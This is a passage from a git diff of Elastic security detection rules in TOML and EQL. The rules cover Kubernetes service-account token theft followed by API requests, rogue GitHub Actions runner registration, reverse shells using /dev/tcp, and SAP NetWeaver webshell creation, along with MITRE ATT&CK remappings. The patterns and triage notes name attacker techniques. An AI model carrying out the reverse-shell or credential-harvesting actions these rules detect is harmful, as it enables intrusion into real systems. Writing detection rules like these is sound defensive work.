"/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) or + /* General exclusions for utilities that are not typically used for Kubernetes API requests */ + process.name in ( + "sleep", "head", "tail", "apk", "apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf", + "pacman", "rpm", "dpkg" + ) + )] by orchestrator.resource.name + [any where + event.dataset == "kubernetes.audit_logs" and + kubernetes.audit.stage in ("ResponseStarted","ResponseComplete") and + kubernetes.audit.verb in ("get", "list", "watch", "create", "patch", "update") and + ( + kubernetes.audit.objectRef.resource in ( + "pods", "secrets", "serviceaccounts", "configmaps", + "roles", "rolebindings", "clusterroles", "clusterrolebindings", + "deployments", "daemonsets", "statefulsets", "jobs", "cronjobs", + "nodes", "namespaces", + "selfsubjectaccessreviews", "selfsubjectrulesreviews", "subjectaccessreviews" + ) + or ( + kubernetes.audit.objectRef.resource == "pods" and + kubernetes.audit.objectRef.subresource in ("exec", "attach", "portforward", "log") + ) + ) + ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml new file mode 100644 index 00000000000..95229fe817d --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml @@ -0,0 +1,137 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the access to the service +account token or certificate followed by the execution of a direct interactive Kubernetes API request. An adversary may +need to access the service account token or certificate to gain access to the Kubernetes API server or other resources +within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the +cluster, and may indicate an attempt to move laterally within the cluster. +""" +false_positives = [ + """ + There is a potential for false positives if the access to the service account token or certificate is used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.file*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Service Account Token or Certificate Access Followed by Kubernetes API Request" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Service Account Token or Certificate Access Followed by Kubernetes API Request + +This rule correlates interactive access to a pod’s service account token or CA certificate with a near-immediate Kubernetes API request, signaling credential harvesting to query the cluster and potential lateral movement. An attacker execs into a container, reads /var/run/secrets/kubernetes.io/serviceaccount/token and ca.crt, then uses curl or kubectl with that token and CA to list pods, get secrets, or create a privileged pod to pivot across nodes. + +### Possible investigation steps + +- Attribute the activity by identifying the pod, container image, node, and interactive session initiator (e.g., kubectl exec) from Kubernetes events and cluster logs to determine whether a human or automation accessed the credentials. +- Retrieve the pod’s service account and enumerate its RBAC bindings to assess effective privileges, highlighting any ability to read secrets, create pods, or modify roles. +- Reconstruct the full sequence of audit log requests tied to that pod/user around the alert, noting resources, verbs, namespaces, response codes, and userAgent to distinguish legitimate controller behavior from reconnaissance. +- Examine the container for signs of token abuse or exfiltration by reviewing shell history and filesystem artifacts, and correlate with network egress from the pod to external destinations. +- Validate that the API request originated from the same pod by matching source IP, node, and TLS client identity, and check for concurrent suspicious activity on the node or other pods. + +### False positive analysis + +- A cluster operator troubleshooting an issue execs into a pod, inspects the service account token or CA certificate, and then uses the pod’s credentials to make a quick Kubernetes API request to verify permissions or list resources. +- A workload running with TTY/stdin enabled is marked as interactive, and the application legitimately reads the service account token (e.g., on startup or token refresh) to perform routine API operations such as leader election or informer watches, producing the observed file access followed by audit log activity. + +### Response and remediation + +- Immediately isolate the pod that read /var/run/secrets/kubernetes.io/serviceaccount/token or ca.crt by deleting the pod or scaling its deployment to zero, cordoning its node if similar behavior is seen on other pods, and applying a NetworkPolicy that blocks the pod’s access to the API server while you capture its filesystem. +- Revoke access by removing the implicated service account’s RBAC bindings, recreating the service account to invalidate tokens, restarting any workloads that mount /var/run/secrets/kubernetes.io/serviceaccount, and rotating the service-account signing key if compromise is suspected. +- Validate and recover by reviewing audit records for unauthorized actions (e.g., secrets reads, pod or role changes), rolling back or deleting any malicious resources, and redeploying affected workloads from trusted images with signed releases. +- Escalate to incident response immediately if you observe API requests from the pod that read secrets, create pods in other namespaces, alter Role or ClusterRoleBindings, or transmit the token/ca.crt via curl or similar tooling to external addresses. +- Harden by disabling automountServiceAccountToken on pods that don't require it, scoping service accounts to a single namespace with least‑privilege RBAC, enforcing Pod Security Admission to block privileged/interactive shells, and restricting exec/attach via RBAC or admission policies. +""" +risk_score = 47 +rule_id = "4bd306f9-ee89-4083-91af-e61ed5c42b9a" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=60s + [file where host.os.type == "linux" and event.type == "change" and event.action == "open" and + file.path in ("/var/run/secrets/kubernetes.io/serviceaccount/token", "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt") and + process.interactive == true and container.id like "*"] by orchestrator.resource.name + [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml index 8370e42b986..0074a431b39 100644 --- a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml +++ b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/12" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/12" [rule] author = ["Elastic"] @@ -88,22 +88,12 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Exploitation for Client Execution" + id = "T1203" + reference = "https://attack.mitre.org/techniques/T1203/" diff --git a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml index 5433f0a5906..13869c98f9b 100644 --- a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml +++ b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/03" [rule] author = ["Elastic"] @@ -50,7 +50,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -61,6 +73,16 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" @@ -75,3 +97,29 @@ reference = "https://attack.mitre.org/techniques/T1204/005/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/execution_openclaw_agent_child_process.toml b/rules/cross-platform/execution_openclaw_agent_child_process.toml index fe4247891cb..919bf598224 100644 --- a/rules/cross-platform/execution_openclaw_agent_child_process.toml +++ b/rules/cross-platform/execution_openclaw_agent_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -56,7 +56,18 @@ references = [ risk_score = 47 rule_id = "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e" severity = "medium" -tags = ["Domain: Endpoint", "Domain: LLM", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: LLM", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -72,51 +83,36 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] -framework = "MITRE ATLAS" - +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "AML.T0051" -name = "LLM Prompt Injection" -reference = "https://atlas.mitre.org/techniques/AML.T0051/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] -id = "AML.TA0005" -name = "Execution" -reference = "https://atlas.mitre.org/tactics/AML.TA0005/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml index 7c525f9c541..e69435f0dc9 100644 --- a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml +++ b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic"] @@ -67,3 +67,21 @@ EggShell is a post-exploitation tool used on macOS and Linux systems, allowing a - Enhance monitoring and detection capabilities to identify similar threats in the future, focusing on command and scripting interpreter activities as outlined in MITRE ATT&CK technique T1059.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_potential_widespread_malware_infection.toml b/rules/cross-platform/execution_potential_widespread_malware_infection.toml index e884ea942a1..3f52c996a02 100644 --- a/rules/cross-platform/execution_potential_widespread_malware_infection.toml +++ b/rules/cross-platform/execution_potential_widespread_malware_infection.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2024/05/08" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/16" [rule] author = ["Elastic"] @@ -72,3 +72,21 @@ from logs-endpoint.alerts-* ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml index 477b492e00c..4a04cf04a54 100644 --- a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml +++ b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/27" [rule] author = ["Elastic"] @@ -83,7 +83,20 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,6 +112,16 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/execution_register_github_actions_runner.toml new file mode 100644 index 00000000000..bd5c534de51 --- /dev/null +++ b/rules/cross-platform/execution_register_github_actions_runner.toml @@ -0,0 +1,126 @@ +[metadata] +creation_date = "2025/11/26" +integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] +maturity = "production" +updated_date = "2025/11/26" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the configuration of a GitHub Actions self-hosted runner using the Runner.Listener binary. +When a machine is registered to a remote repository, its owner gains the ability to execute arbitrary workflow commands on that host. +Unexpected or unauthorized runner registration may indicate adversarial activity aimed at establishing remote code execution +via malicious GitHub workflows. +""" +false_positives = [ + "Authorized github repository with no malicious workflow actions.", +] +from = "now-9m" +index = [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" +] +language = "eql" +license = "Elastic License v2" +name = "Remote GitHub Actions Runner Registration" +note = """## Triage and analysis + +### Investigating Remote GitHub Actions Runner Registration + +Unexpected or unauthorized Github actions runner registration may indicate adversarial activity aimed at establishing remote code execution via malicious GitHub workflows. + +### Possible investigation steps + +- Review the remote repository details and reputation. +- Examine the remote repository for any suspicious workflows run commands in the `.github/workflows` folder. +- Examine the execution context like process tree, associated network and file activities. +- Verify if there is adjascent any sensitive file access or collection. +- Correlate with other alerts and investiguate if this activity is related to a supply chain attack. + +### False positive analysis + +- Authorized configuration changes. + +### Response and remediation + +- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement. +- Terminate any suspicious child processes that were initiated by the registered Github actions runner. +- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise. +- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed. +- Implement application whitelisting to prevent unauthorized execution. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.""" +references = [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2", +] +risk_score = 47 +rule_id = "57e118c1-19eb-4c20-93a6-8a6c30a5b48b" +severity = "medium" +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" + +query = ''' +process where event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and + process.name in ("Runner.Listener", "Runner.Listener.exe") and + process.args == "configure" and process.args == "--url" and process.args == "--token" +''' + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/execution_revershell_via_shell_cmd.toml new file mode 100644 index 00000000000..62a96f31eb4 --- /dev/null +++ b/rules/cross-platform/execution_revershell_via_shell_cmd.toml @@ -0,0 +1,102 @@ +[metadata] +creation_date = "2020/01/07" +integration = ["endpoint"] +maturity = "production" +updated_date = "2024/09/23" + +[rule] +author = ["Elastic"] +description = "Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity." +from = "now-9m" +index = ["auditbeat-*", "logs-endpoint.events.*"] +language = "eql" +license = "Elastic License v2" +name = "Potential Reverse Shell Activity via Terminal" +note = """## Triage and analysis + +### Investigating Potential Reverse Shell Activity via Terminal + +A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing. + +This rule identifies commands that are potentially related to reverse shell activities using shell applications. + +#### Possible investigation steps + +- Examine the command line and extract the target domain or IP address information. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +""" +references = [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/WangYihang/Reverse-Shell-Manager", + "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/", + "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security", +] +risk_score = 73 +rule_id = "a1a0375f-22c2-48c0-81a4-7c2d11cc6856" +setup = """## Setup + +If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, +events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. +Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate +`event.ingested` to @timestamp. +For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html +""" +severity = "high" +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] +timestamp_override = "event.ingested" +type = "eql" + +query = ''' +process where event.type in ("start", "process_started") and + process.name in ("sh", "bash", "zsh", "dash", "zmodload") and + process.args : ("*/dev/tcp/*", "*/dev/udp/*", "*zsh/net/tcp*", "*zsh/net/udp*") and + + /* noisy FPs */ + not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and + not process.command_line : ( + "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", + "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and + not process.parent.command_line : "runc init" +''' + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml new file mode 100644 index 00000000000..a9a731ace09 --- /dev/null +++ b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml @@ -0,0 +1,90 @@ +[metadata] +creation_date = "2025/04/26" +integration = ["endpoint"] +maturity = "production" +updated_date = "2025/04/26" + +[rule] +author = ["Elastic"] +description = """ +Identifies suspicious Java file creation in the IRJ directory of the SAP NetWeaver application. This may indicate an attempt to deploy a webshell. +""" +from = "now-9m" +index = ["auditbeat-*", "logs-endpoint.events.file*"] +language = "eql" +license = "Elastic License v2" +name = "Potential SAP NetWeaver WebShell Creation" +references = [ + "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/", + "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/" +] +risk_score = 73 +rule_id = "f7d588ba-e4b0-442e-879d-7ec39fbd69c5" +severity = "high" +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" + +query = ''' +file where host.os.type in ("linux", "windows") and event.action == "creation" and + file.extension : ("jsp", "java", "class") and + file.path : ("/*/sap.com/*/servlet_jsp/irj/root/*", + "/*/sap.com/*/servlet_jsp/irj/work/*", + "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\root\\*", + "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\work\\*") +''' +note = """## Triage and analysis + +### Investigating Potential SAP NetWeaver WebShell Creation + +### Possible investigation steps + +- Examine the file creation event and the associated HTTP post request logs details to identify the source of the creation. +- Examine the process tree to verify the parent-child relationship between the Java process and any suspicious child processes such as shell scripts or scripting languages (e.g., sh, bash, curl, python). +- Check the command line arguments and environment variables of the suspicious child processes to identify any potentially malicious payloads or commands being executed. +- Investigate the host's recent activity and logs for any other indicators of compromise or unusual behavior that might correlate with the suspected exploitation attempt. +- Assess the system for any unauthorized changes or new files that may have been introduced as a result of the exploitation attempt, focusing on JSP files under the IRJ root directory. + + +### Response and remediation + +- Immediately isolate the affected host from the network to prevent further outbound connections and potential lateral movement. +- Terminate any suspicious Java processes identified in the alert, especially those making outbound connections to LDAP, RMI, or DNS ports. +- Conduct a thorough review of the affected system for any unauthorized changes or additional malicious processes, focusing on child processes like shell scripts or scripting languages. +- Restore the affected system from a known good backup if unauthorized changes or malware are detected. +- Update and patch Java and any related applications to the latest versions to mitigate known vulnerabilities. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on other systems within the network.""" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + + +[rule.threat.tactic] +id = "TA0002" +name = 